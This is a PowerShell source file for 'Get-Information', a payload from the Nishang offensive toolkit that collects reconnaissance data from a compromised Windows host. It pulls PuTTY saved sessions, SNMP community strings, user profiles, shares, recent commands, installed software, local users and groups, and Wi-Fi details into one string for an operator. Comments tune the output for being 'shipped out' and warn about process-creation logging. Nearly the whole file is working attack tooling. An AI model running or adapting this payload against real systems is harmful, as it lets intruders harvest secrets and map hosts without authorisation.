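function Get-Information
{
<#
.SYNOPSIS
Nishang Payload which gathers juicy information from the target.

.DESCRIPTION
This payload extracts information from the registry and from a few built-in
commands (net.exe, netsh.exe) and returns everything as one string.
The information available depends on the privilege with which the script is
executed: the HKLM keys (profile list, shares, SNMP communities, machine-wide
uninstall entries) need read access to the local machine hive, while the
HKCU keys only reflect the user the script runs as.

Registry keys, values or files that do not exist on the host (for example
PuTTY not being installed) are skipped silently instead of writing errors to
the error stream, so the returned text stays clean when it is shipped out.

Operator notes:
 - The output can contain secrets (SNMP community strings, PuTTY session
   settings). Treat it as sensitive data and do not leave it on disk.
 - The net.exe / netsh.exe calls spawn child processes, which are visible to
   any process-creation logging on the host.

.EXAMPLE
PS > Get-Information
Use above to execute the function.

.OUTPUTS
System.String - the collected sections, separated by blank lines.

.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
    [CmdletBinding()]
    Param ()

    # Reads values from a registry key, or from each of its immediate subkeys.
    #   $regkey   - provider path (hklm:\... or hkcu:\...)
    #   $regvalue - "all"     -> every value stored under each key
    #               "allname" -> only the value NAMES under each key
    #               <name>    -> that single value from each key that holds at least one value
    #   $child    - "no" queries $regkey itself; anything else queries its subkeys
    # Missing keys are skipped (-ErrorAction SilentlyContinue) so an absent product
    # does not pollute the error stream of the calling session.
    function registry_values($regkey, $regvalue, $child)
    {
        if ($child -eq "no")
        {
            $keys = Get-Item -Path $regkey -ErrorAction SilentlyContinue
        }
        else
        {
            $keys = Get-ChildItem -Path $regkey -ErrorAction SilentlyContinue
        }

        foreach ($key in $keys)
        {
            if ($null -eq $key) { continue }

            $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            $names = $key.Property

            if ($regvalue -eq "all")
            {
                foreach ($name in $names) { $props.$name }
            }
            elseif ($regvalue -eq "allname")
            {
                foreach ($name in $names) { $name }
            }
            elseif ($null -ne $names -and @($names).Count -gt 0)
            {
                # Emit the named value once per key; keys without any values contribute nothing.
                $props.$regvalue
            }
        }
    }

    # Formats one report section: "Title:" followed by one collected line per row.
    function format_section($title, $lines)
    {
        "${title}:`n" + (@($lines) -join "`r`n")
    }

    # Resolve the hosts file relative to the Windows directory instead of assuming C:\windows.
    $sysRoot = if ($env:SystemRoot) { $env:SystemRoot } else { 'C:\windows' }
    $hostsFile = Join-Path -Path $sysRoot -ChildPath 'System32\drivers\etc\hosts'

    $sections = @()

    # NOTE(review): ProfileList enumerates every profile that has been loaded on the
    # host, not only users currently logged in; the label is kept from the original.
    $sections += format_section "Logged in users" (registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath")
    $sections += format_section "Powershell environment" (registry_values "hklm:\software\microsoft\powershell" "allname")
    $sections += format_section "Putty trusted hosts" (registry_values "hkcu:\software\simontatham\putty" "allname")
    $sections += format_section "Putty saved sessions" (registry_values "hkcu:\software\simontatham\putty\sessions" "all")
    $sections += format_section "Recently used commands" (registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no")
    $sections += format_section "Shares on the machine" (registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no")
    $sections += format_section "Environment variables" (registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no")
    $sections += format_section "More details for current user" (registry_values "hkcu:\Volatile Environment" "all" "no")
    $sections += format_section "SNMP community strings" (registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no")
    # NOTE(review): HKCU normally carries no SYSTEM subtree, so this query is expected to
    # return nothing on a stock host; kept for parity with the original report layout.
    $sections += format_section "SNMP community strings for current user" (registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no")
    $sections += format_section "Installed Applications" (registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname")
    $sections += format_section "Installed Applications for current user" (registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname")
    $sections += format_section "Domain Name" (registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no")
    $sections += format_section "Contents of /etc/hosts" (Get-Content -Path $hostsFile -ErrorAction SilentlyContinue)

    # External tools: each of these is a separate process the target's telemetry may record.
    $sections += format_section "Running Services" (net start)
    $sections += format_section "Account Policy" (net accounts)
    $sections += format_section "Local users" (net user)
    $sections += format_section "Local Groups" (net localgroup)
    $sections += format_section "WLAN Info" (netsh wlan show all)

    # Same layout as before: sections separated by a blank line and a leading space.
    $sections -join "`n`n "
}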